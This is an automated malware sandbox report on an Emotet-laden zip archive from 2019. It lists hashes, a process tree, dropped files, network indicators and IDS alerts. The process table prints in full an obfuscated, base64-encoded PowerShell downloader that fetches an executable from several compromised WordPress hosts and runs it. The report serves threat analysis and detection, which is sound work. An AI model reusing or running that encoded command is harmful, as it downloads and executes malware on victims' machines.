File name: | f8ee5044ff1c81384ecdd4735d5f8d0d93bee834.zip |
Full analysis: | https://app.any.run/tasks/8b1618ba-489a-4048-93d7-a85e26adafd1 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 19, 2019, 06:23:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 70DCDBE1E0186FBE98375B72FAC5C5AD |
SHA1: | 695F67AB37C34F3D539517846EF5F1E01B4874BB |
SHA256: | 58CD281561DAB7638621EBDBF67D0A88CED6D8186201847FEE88B30E768FCA3E |
SSDEEP: | 3072:HQTXsCiaXMT+rF3xrUc5uQJCFgIdhZFo2B8wDT1:bnAc+B3x5w+oLy2BZDp |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | f8ee5044ff1c81384ecdd4735d5f8d0d93bee834 |
---|---|
ZipUncompressedSize: | 328128 |
ZipCompressedSize: | 168522 |
ZipCRC: | 0x0164785e |
ZipModifyDate: | 2019:09:18 18:48:15 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0009 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2892 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3452 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2604 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2708 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3440 | --f0e46278 | C:\Users\admin\835.exe | 835.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2556 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3512 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3636 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2268 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QXJIBZ77IARUGLCT3ZC.temp | — | |
MD5:— | SHA256:— | |||
2556 | easywindow.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | |
MD5:4D1A1DE1F2B1D264377A7A5C5B40B844 | SHA256:F26D8DCEC42E57D0B73D55E706ACDC4416C10F72BEC476F3D48E753C39989436 | |||
2708 | 835.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | |
MD5:80C79B5C354D342D79298E49F62025BE | SHA256:67EB090BCDBDD2E3EBAC1A3CF5C510218916E4AB644DEE242EFA22769D22AE92 | |||
2892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF168d21.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
3452 | 835.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | |
MD5:031903DCFA946BE52040BE42264FB509 | SHA256:FA33DEB2CFEA562C014EA409DBB164B40EA10B55717FF59A8E9070521F05A37C | |||
3636 | easywindow.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | |
MD5:4D1A1DE1F2B1D264377A7A5C5B40B844 | SHA256:F26D8DCEC42E57D0B73D55E706ACDC4416C10F72BEC476F3D48E753C39989436 | |||
2892 | powershell.exe | C:\Users\admin\835.exe | executable | |
MD5:BF2A3BBE79924E52BE9E18824C1E1550 | SHA256:23BB7590D1F79E552182BF686882D05F31035B76BE173B24308EA374BDEAF58D | |||
3440 | 835.exe | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | executable | |
MD5:BF2A3BBE79924E52BE9E18824C1E1550 | SHA256:23BB7590D1F79E552182BF686882D05F31035B76BE173B24308EA374BDEAF58D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2892 | powershell.exe | GET | 200 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | executable | 512 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2892 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
2268 | easywindow.exe | 114.79.134.129:443 | — | D-Vois Broadband Pvt Ltd | IN | malicious |
Domain | IP | Reputation |
---|---|---|
thinhvuongmedia.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2892 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2892 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2892 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2892 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2268 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2268 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2268 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |